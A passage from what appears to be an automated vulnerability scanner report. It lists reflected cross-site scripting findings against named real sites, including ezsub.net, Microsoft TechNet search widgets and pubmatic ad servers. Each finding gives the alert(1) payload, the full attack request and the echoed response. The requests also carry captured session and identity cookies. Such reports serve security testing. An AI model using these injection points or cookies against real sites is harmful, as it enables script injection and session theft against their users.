Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="RDRID" value="87621"><SCRIPT>ALERT(1)</SCRIPT>5029AC893EF">
...[SNIP]...
5.35. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ccef"><script>alert(1)</script>0d1de7150bc was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN7ccef"><script>alert(1)</script>0d1de7150bc&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="SBTYPE" value="QN7CCEF"><SCRIPT>ALERT(1)</SCRIPT>0D1DE7150BC">
...[SNIP]...
5.36. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2eca"><script>alert(1)</script>0294bf7bc9 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INETd2eca"><script>alert(1)</script>0294bf7bc9&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="SOURCE" value="INETD2ECA"><SCRIPT>ALERT(1)</SCRIPT>0294BF7BC9">
...[SNIP]...
5.37. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 794cd<script>alert(1)</script>e16bfebfc40 was submitted in the jt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Type: text/html

<html><body><h1>FOXISAPI call failed</h1><p><b>Progid is:</b> main.sv
<p><b>Method is:</b> run
<p><b>Parameters are:</b> jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
<p>
...[SNIP]...
5.38. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 147e7<script>alert(1)</script>0be166769ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001764
Content-Length: 68
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:35 GMT
Connection: close

Not Found: /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css
5.39. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e468a<script>alert(1)</script>47bf0b2c2b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001332
Content-Length: 68
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:35 GMT
Connection: close

Not Found: /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0
5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4f35<img src=a onerror=alert(1)>f86de5af1be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=TechNet&loc=en-us&focusOnInit=true&Refinement=86&watermark=TechNet%20Magazine&f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/ff426023.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092939992:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001?@E0I02h?@E0I

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 93c60764a7ce82b2ad6321ad9ce04f9c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:41:44 GMT
Date: Sat, 26 Mar 2011 01:41:44 GMT
Content-Length: 12899
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
,"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=86&f4f35<img src=a onerror=alert(1)>f86de5af1be=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...
5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54008<img%20src%3da%20onerror%3dalert(1)>89def521705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54008<img src=a onerror=alert(1)>89def521705 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&54008<img%20src%3da%20onerror%3dalert(1)>89def521705=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301090290290:ss=1301090290290; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
ntCoent-Length: 12845
Content-Type: application/x-javascript
ETag: 3a527f2cf9226449bb99733ecdd6b9ad
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB31
Content-Length: 12845
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:40:07 GMT
Date: Sat, 26 Mar 2011 01:40:07 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&54008<img src=a onerror=alert(1)>89def521705=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...
5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67fe9<img src=a onerror=alert(1)>e5797209df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=TechNet&loc=en-us&focusOnInit=true&Refinement=86&watermark=TechNet%20Magazine&67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg670984.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092937570:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; s_sq=msstotn%2Cmsstotnonly%2Cmsstotnmktenus%2Cmsstotncentroll%2Cmsstotnctmag%3D%2526pid%253Dtechnet%25253A/en-us/magazine/gg703766%2526pidt%253D1%2526oid%253Dhttp%25253A//technet.microsoft.com/en-us/magazine/ff426023.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 12898
Content-Type: application/x-javascript
ETag: 4333d9fde5edd64c06ec0c3e90339f31
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Content-Length: 12898
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:41:39 GMT
Date: Sat, 26 Mar 2011 01:41:39 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
,"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=86&67fe9<img src=a onerror=alert(1)>e5797209df=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...
5.43. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4445b'-alert(1)-'90d16fca36c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html4445b'-alert(1)-'90d16fca36c HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:38 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 565

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
op:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html4445b'-alert(1)-'90d16fca36c">
...[SNIP]...
5.44. http://image3.pubmatic.com/AdServer/UPug [ran parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f79c'-alert(1)-'99a5d4b72c7 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.114078968763351449f79c'-alert(1)-'99a5d4b72c7&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
